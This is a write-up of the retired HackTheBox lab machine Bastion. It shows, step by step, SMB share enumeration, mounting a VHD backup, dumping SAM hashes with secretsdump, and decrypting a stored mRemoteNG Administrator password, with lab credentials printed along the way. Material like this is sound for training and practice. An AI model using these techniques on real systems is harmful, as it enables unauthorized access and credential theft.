HackTheBox - Bastion



OS Difficulty IP Address Status
Windows Easy 10.10.10.134 Retired

This box was classified as an easy machine by L4mpje on HackTheBox. Enumerating the box, we will find a SMB share used for backup. We will mount it and find a virtual hard disk file, mount the .vhd, and dump the SAM and SYSTEM files; crack it to get our initial foothold. Enumerating to privilege escalate, we find a strange program, mRemoteNG, and it's password can be decrypted with mRemoteNG Decryption Tool which will give us the Administrator password.

Phase 1 - Enumeration

Nmap

As usual, we start phase one with nmap, to see what ports are opened.

PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -36m05s, deviation: 1h09m16s, median: 3m53s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-18T19:48:23+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-18T17:48:27
|_  start_date: 2021-07-17T01:17:54

From the nmap result, we find out that its running a Windows Server 2016.

SMB

We will enumerate SMB with a non-existing user.

smbmap -u DoesNotExist -H 10.10.10.134

[+] Guest session       IP: 10.10.10.134:445    Name: 10.10.10.134                                      
[/] Work[!] Unable to remove test directory at \\10.10.10.134\Backups\GAUTGQWZEI, please remove manually
        Disk                        Permissions     Comment
        ----                        -----------     -------
        ADMIN$                      NO ACCESS       Remote Admin
        Backups                     READ, WRITE
        C$                          NO ACCESS       Default share
        IPC$                        READ ONLY       Remote IPC

It looks like there is a share folder called ‘Backups’ with read and write access. Let’s mount it and see what’s in it.

Mounting SMB Share

# we will make a folder to mount the share drive in
mkdir /mnt/smb

# then we will mount the drive to the folder
mount -t cifs //10.10.10.134/Backups /mnt/smb

Going through the share drive, we find something interesting.

/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351$ ls -la
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

A virtual hard disk (vhd) file, which looks to be the main drive’s backup.

Phase 2 - Exploitation

Guestmount

Let’s mount the .vhd file

# we will create a folder to mount the vhd
mkdir /mnt/vhd

# then mount the vhd drive
sudo guestmount --add  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/vhd

Dumping SAM and SYSTEM files

Going through the vhd backup, there wasn’t anything interesting; so we went to the directory location where the Windows SAM (Security Account Manager) and SYSTEM files are kept.

# SAM & SYSTEM location
cd /mnt/vhd/Windows/System32/config/

# copying the files to our local kali machine
cp SAM SYSTEM ~/Documents/htb/machines/bastion/

Dumping/Cracking Hashes

Using Impacket’s SecretsDump, we dump the user accounts password hashes

impacket-secretsdump -sam SAM -system SYSTEM local

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up...

We then go to hashes.org to crack the hashes online. From the 3 dumped hashes, one cracked for the user L4mpje.

We login with SSH and get the user.txt flag
l4mpje:bureaulampje

Phase 3 - Privilege Escalation

Going through and enumerating the Windows machine, we find an out of place program.

cd C:\Program Files (x86)\mRemoteNG

Doing a little Googling, we find an article on how mRemoteNG Password is insecure and how to get the saved, but encrypted password which could be decrypted by using a tool on Github (mRemoteNG Decryption Tool).

According to the article, all we need is the saved and encrypted password string from the mRemoteNG’s temporary configuration file named ‘confCons.xml’ which we will find in the cache data.

cd C:\Users\L4mpje\AppData\Roaming\mRemoteNG

type confCons.xml

Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="

And we found the encrypted saved password string we were looking for, we the run the mRemoteNG-Decrypt tool from Github with the following command:

python3 mRemoteNG-Decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

Password: thXLHM96BeKL0ER2

# successful SSH login
ssh [email protected] 

[email protected]'s password: 

Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. 
[email protected] C:\Users\Administrator>

Finally, we get the Administrator password and have escalated privileges.